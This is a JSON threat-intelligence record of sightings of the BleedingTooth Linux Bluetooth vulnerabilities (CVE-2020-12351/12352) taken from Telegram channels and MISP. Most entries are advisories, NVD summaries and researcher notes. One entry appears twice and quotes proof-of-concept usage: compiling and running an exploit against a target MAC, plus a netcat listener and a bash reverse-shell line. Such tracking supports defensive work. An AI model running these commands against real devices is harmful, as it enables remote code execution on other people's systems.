{"vulnerability": "CVE-2020-1235", "sightings": [{"uuid": "77f25b6e-6ba9-48c0-ba91-0e7dbebc0d80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "MISP/dacd13f2-d0f5-4acd-8609-392011902770", "content": "", "creation_timestamp": "2024-11-14T06:08:51.000000Z"}, {"uuid": "328f0c11-636e-431b-b800-864c5f573631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "seen", "source": "MISP/c44a1e3b-f87a-48da-ab8c-85c16118c54c", "content": "", "creation_timestamp": "2024-11-14T06:08:51.000000Z"}, {"uuid": "85ea022f-bcac-4d07-b61e-99d502401050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/novitoll_ch/107", "content": "\u0439\u0435\u043f, \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0434\u0443\u043c\u0430\u044e, \u0431\u0443\u0434\u0435\u043c \u0441\u0442\u0440\u0438\u043c\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435. CVE-2020-12351", "creation_timestamp": "2020-10-20T11:06:43.000000Z"}, {"uuid": "85eecf62-83a5-40f1-ac1c-372e9dca5a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/novitoll_ch/105", "content": "https://youtu.be/iEByzdTp-44\n\n\u0420\u0430\u0437\u043e\u0431\u0440\u0430\u043b CVE-2020-12352 (stack leak \u0432 struct a2mp_info_rsp),  CVE-2020-12351 (heap-based type confusion \u0432  sk_filter(struct amp_mgr data)),  \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b, \u0447\u0442\u043e \u0443 \u043c\u0435\u043d\u044f \u0441 Bluetooth 4.1  \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2020-24490, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u0430\u043b\u0438\u0434\u0435\u043d  \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f Bluetooth 5 chip + \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 \u0441\u043b\u0443\u0448\u0430\u043d\u0438\u044f. \n\n\u041d\u0430 \u0441\u043b\u0435\u0434 \u0440\u0430\u0437 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u044e Ubuntu 20.04 + KASAN, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043d\u0435 \u0437\u0430\u0432\u0435\u043b\u0441\u044f \u043f\u043e\u0447\u0435\u043c\u0443-\u0442\u043e, \u043c\u0431 BusyBox \u0434\u0430\u0436\u0435 \u043b\u0443\u0447\u0448\u0435 \u0431\u0443\u0434\u0435\u0442.  \u0418 \u0435\u0449\u0435 \u0431\u044b \u0441\u0442\u0430\u0442\u044c\u044e \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0447\u0442\u043e \u043b\u0438 \u0434\u043b\u044f \u0430\u043d\u0433\u043b\u043e\u043f\u0443\u0431\u043b\u0438\u043a\u0438. Stay tuned ^_^", "creation_timestamp": "2020-10-17T21:21:58.000000Z"}, {"uuid": "3f73aded-d0a3-4e3e-b086-9c3618a8097b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "seen", "source": "https://t.me/novitoll_ch/105", "content": "https://youtu.be/iEByzdTp-44\n\n\u0420\u0430\u0437\u043e\u0431\u0440\u0430\u043b CVE-2020-12352 (stack leak \u0432 struct a2mp_info_rsp),  CVE-2020-12351 (heap-based type confusion \u0432  sk_filter(struct amp_mgr data)),  \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b, \u0447\u0442\u043e \u0443 \u043c\u0435\u043d\u044f \u0441 Bluetooth 4.1  \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2020-24490, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u0430\u043b\u0438\u0434\u0435\u043d  \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f Bluetooth 5 chip + \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 \u0441\u043b\u0443\u0448\u0430\u043d\u0438\u044f. \n\n\u041d\u0430 \u0441\u043b\u0435\u0434 \u0440\u0430\u0437 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u044e Ubuntu 20.04 + KASAN, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043d\u0435 \u0437\u0430\u0432\u0435\u043b\u0441\u044f \u043f\u043e\u0447\u0435\u043c\u0443-\u0442\u043e, \u043c\u0431 BusyBox \u0434\u0430\u0436\u0435 \u043b\u0443\u0447\u0448\u0435 \u0431\u0443\u0434\u0435\u0442.  \u0418 \u0435\u0449\u0435 \u0431\u044b \u0441\u0442\u0430\u0442\u044c\u044e \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0447\u0442\u043e \u043b\u0438 \u0434\u043b\u044f \u0430\u043d\u0433\u043b\u043e\u043f\u0443\u0431\u043b\u0438\u043a\u0438. Stay tuned ^_^", "creation_timestamp": "2020-10-17T21:21:58.000000Z"}, {"uuid": "1ce87d9f-2dbc-46c8-b8e9-d6de6e15bb83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "published-proof-of-concept", "source": "https://t.me/novitoll_ch/101", "content": "BleedingTooth. \u0437\u0430\u0432\u0442\u0440\u0430 \u0432 \u043c\u043e\u0435\u043c \u0447\u0430\u0442\u0435 (@binexp) \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e CVE-2020-12351, CVE-2020-12352.   \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u043f\u043e \u043a\u0440\u0443\u043f\u0438\u043d\u043a\u0435 \u0447\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e, \u0435\u0441\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e PoC, \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c \u0435\u0433\u043e. \u042d\u0442\u043e\u0442 1-day  2-3 \u0434\u043d\u044f \u043d\u0430\u0437\u0430\u0434 Google p0 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b (Andy Ngyuen). \u0421\u0432\u0435\u0436\u0430\u0447\u043e\u043a. \u041c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0438\u0447\u0435\u0433\u043e \u0438 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f, \u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c", "creation_timestamp": "2020-10-16T13:11:28.000000Z"}, {"uuid": "b09c446c-babb-4bbb-b902-73d0d1655989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "published-proof-of-concept", "source": "https://t.me/novitoll_ch/101", "content": "BleedingTooth. \u0437\u0430\u0432\u0442\u0440\u0430 \u0432 \u043c\u043e\u0435\u043c \u0447\u0430\u0442\u0435 (@binexp) \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e CVE-2020-12351, CVE-2020-12352.   \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u043f\u043e \u043a\u0440\u0443\u043f\u0438\u043d\u043a\u0435 \u0447\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e, \u0435\u0441\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e PoC, \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c \u0435\u0433\u043e. \u042d\u0442\u043e\u0442 1-day  2-3 \u0434\u043d\u044f \u043d\u0430\u0437\u0430\u0434 Google p0 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b (Andy Ngyuen). \u0421\u0432\u0435\u0436\u0430\u0447\u043e\u043a. \u041c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0438\u0447\u0435\u0433\u043e \u0438 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f, \u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c", "creation_timestamp": "2020-10-16T13:11:28.000000Z"}, {"uuid": "b1e26b95-0619-4b77-ac36-09ba8aa45fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/pwnwiki_zhchannel/102", "content": "CVE-2020-12352&CVE-2020-12351 Linux Kernel 5.4 BleedingTooth\u9060\u7a0b\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\nhttps://short.pwnwiki.org/?c=U8IwVQ", "creation_timestamp": "2021-09-21T06:42:51.000000Z"}, {"uuid": "a0588743-b1dd-46e8-b68c-5621c8a2f682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12359", "type": "exploited", "source": "Telegram/6OPUWYP6Xw3r-HG5oXkj69p0s_-TG6H6NW7RPOzozjXRRSk", "content": "", "creation_timestamp": "2021-06-10T02:58:20.000000Z"}, {"uuid": "c8cfdb8d-4a2f-451f-b814-431900a9e106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "seen", "source": "https://t.me/arpsyndicate/108", "content": "#ExploitObserverAlert\n\nCVE-2020-12352\n\nDESCRIPTION: Exploit Observer has 13 entries related to CVE-2020-12352. Improper access control in BlueZ may allow an unauthenticated user to potentially enable information disclosure via adjacent access.\n\nFIRST-EPSS: 0.002190000\nNVD-IS: 3.6\nNVD-ES: 2.8", "creation_timestamp": "2023-11-12T02:51:29.000000Z"}, {"uuid": "4e5dc24f-26ce-44e9-9990-e063c8b76952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/4628", "content": "BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution\nt.me/indoghostsec\n\nThis Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.\n\nUsage:\n\n$ gcc -o exploit exploit.c -lbluetooth\nand execute it as:\n\n$ sudo ./exploit target_mac source_ip source_port\nIn another terminal, run:\n\n$ nc -lvp 1337\nexec bash -i 2>&0 1>&0\nIf successful, a calc can be spawned with:\n\nexport XAUTHORITY=/run/user/1000/gdm/Xauthority\nexport DISPLAY=:0\ngnome-calculator\nThis Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:\n\n5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\nThe success rate of the exploit is estimated at 80%.", "creation_timestamp": "2021-04-07T17:47:27.000000Z"}, {"uuid": "b3987ee8-2a5a-4a90-babf-0be6a6a1c98b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/4628", "content": "BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution\nt.me/indoghostsec\n\nThis Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.\n\nUsage:\n\n$ gcc -o exploit exploit.c -lbluetooth\nand execute it as:\n\n$ sudo ./exploit target_mac source_ip source_port\nIn another terminal, run:\n\n$ nc -lvp 1337\nexec bash -i 2>&0 1>&0\nIf successful, a calc can be spawned with:\n\nexport XAUTHORITY=/run/user/1000/gdm/Xauthority\nexport DISPLAY=:0\ngnome-calculator\nThis Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:\n\n5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\nThe success rate of the exploit is estimated at 80%.", "creation_timestamp": "2021-04-07T17:47:27.000000Z"}, {"uuid": "4a133813-c3c3-484e-9e8d-f4b2ba3aa62e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "seen", "source": "https://t.me/pwnwiki_zhchannel/102", "content": "CVE-2020-12352&CVE-2020-12351 Linux Kernel 5.4 BleedingTooth\u9060\u7a0b\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\nhttps://short.pwnwiki.org/?c=U8IwVQ", "creation_timestamp": "2021-09-21T06:42:51.000000Z"}, {"uuid": "f1d90131-6536-4552-8608-4c28c59681ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12357", "type": "published-proof-of-concept", "source": "Telegram/X7653J0Kjw6ZffIuTbypL4yk-qUW8uW88lT58GewnvxbQGk", "content": "", "creation_timestamp": "2021-06-10T02:58:14.000000Z"}, {"uuid": "16924b33-f482-44d7-bfa6-c5d52aba9891", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/SecLabNews/9073", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 Bluetooth \u0432 \u044f\u0434\u0440\u0435 Linux (CVE-2020-12351, CVE-2020-12352 \u0438 CVE-2020-24490), \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 BleedingTooth, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.     \n\ufeff\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0442\u0435\u043a\u0435 Bluetooth \u0434\u043b\u044f Linux \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 zero-click", "creation_timestamp": "2020-10-15T10:10:02.000000Z"}, {"uuid": "1779dea9-c919-4484-a413-3c77ba67c267", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "seen", "source": "https://t.me/SecLabNews/9073", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 Bluetooth \u0432 \u044f\u0434\u0440\u0435 Linux (CVE-2020-12351, CVE-2020-12352 \u0438 CVE-2020-24490), \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 BleedingTooth, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.     \n\ufeff\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0442\u0435\u043a\u0435 Bluetooth \u0434\u043b\u044f Linux \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 zero-click", "creation_timestamp": "2020-10-15T10:10:02.000000Z"}, {"uuid": "63a48a41-353a-4619-a87a-660381f583a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/cibsecurity/15919", "content": "\u203c CVE-2020-25661 \u203c\n\nA Red Hat only CVE-2020-12351 regression issue was found in the way the Linux kernel's Bluetooth implementation handled L2CAP packets with A2MP CID. This flaw allows a remote attacker in an adjacent range to crash the system, causing a denial of service or potentially executing arbitrary code on the system by sending a specially crafted L2CAP packet. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-06T00:50:03.000000Z"}, {"uuid": "e0b20ecf-9289-4c76-b804-26ced680d347", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1918", "content": "#WLAN_Security\nBleedingTooth:\nVulnerabilities in Linux Bluetooth Allow 0-Click Attacks:\n1. CVE-2020-12351.\nHeap-Based Type Confusion in L2CAP:\nhttps://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq\n2. CVE-2020-12352.\nBadChoice - Stack-Based Infoleak in A2MP:\nhttps://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq\n3. CVE-2020-24490.\nHeap-Based Buffer Overflow in HCI event packet parser:\nhttps://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649", "creation_timestamp": "2024-07-19T19:59:44.000000Z"}, {"uuid": "1dff58c7-4a03-4092-9a4f-5b4468b71f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1918", "content": "#WLAN_Security\nBleedingTooth:\nVulnerabilities in Linux Bluetooth Allow 0-Click Attacks:\n1. CVE-2020-12351.\nHeap-Based Type Confusion in L2CAP:\nhttps://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq\n2. CVE-2020-12352.\nBadChoice - Stack-Based Infoleak in A2MP:\nhttps://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq\n3. CVE-2020-24490.\nHeap-Based Buffer Overflow in HCI event packet parser:\nhttps://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649", "creation_timestamp": "2024-07-19T19:59:44.000000Z"}, {"uuid": "a2504b80-f403-41d7-903a-f12b4cca1e03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "published-proof-of-concept", "source": "https://t.me/binary_xor/462", "content": "CVE-2020-12352. \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e \u0440\u0430\u0431\u043e\u0442\u0443 \u043d\u0430\u0434 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u043f\u043e \u043b\u0438\u043a\u0443 \u0441\u0442\u044d\u043a\u0430 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b struct a2mp_info_rsp. \u0427\u0435\u0442 \u043f\u043e\u043a\u0430 \u0447\u0442\u043e \u0445\u0437 \u043a\u0430\u043a \u044d\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c, \u043d\u043e \u0435\u0441\u0442\u044c \u0438\u0434\u0435\u0438. \u0422\u0430\u043a \u043a\u0430\u043a, \u0442\u0430\u043c \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 __packed \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u0442\u0430\u043a\u0438\u0435 \u0431\u0430\u0439\u0442\u044b \u043f\u0440\u0438 \u043b\u0438\u043a\u0435.", "creation_timestamp": "2020-11-19T19:10:18.000000Z"}, {"uuid": "b800b024-054c-4fe0-9b53-0b9d9501443c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "seen", "source": "https://t.me/cibsecurity/15909", "content": "\u203c CVE-2020-25662 \u203c\n\nA Red Hat only CVE-2020-12352 regression issue was found in the way the Linux kernel's Bluetooth stack implementation handled the initialization of stack memory when handling certain AMP packets. This flaw allows a remote attacker in an adjacent range to leak small portions of stack memory on the system by sending specially crafted AMP packets. The highest threat from this vulnerability is to data confidentiality.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-06T00:49:47.000000Z"}, {"uuid": "9a628ce4-e0d7-4495-8127-4a03119939ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12353", "type": "seen", "source": "https://t.me/cibsecurity/16262", "content": "\u203c CVE-2020-12353 \u203c\n\nImproper permissions in the Intel(R) Data Center Manager Console before version 3.6.2 may allow an authenticated user to potentially enable denial of service via network access.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-12T22:32:09.000000Z"}, {"uuid": "23a30045-fb33-4bc3-8177-b81468a5afde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12352", "type": "seen", "source": "https://t.me/cibsecurity/16717", "content": "\u203c CVE-2020-12352 \u203c\n\nImproper access control in BlueZ may allow an unauthenticated user to potentially enable information disclosure via adjacent access.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-23T20:46:01.000000Z"}, {"uuid": "c60b9f8a-43a2-4d27-a788-f2250c430a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/cibsecurity/16718", "content": "\u203c CVE-2020-12351 \u203c\n\nImproper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-23T20:46:02.000000Z"}]}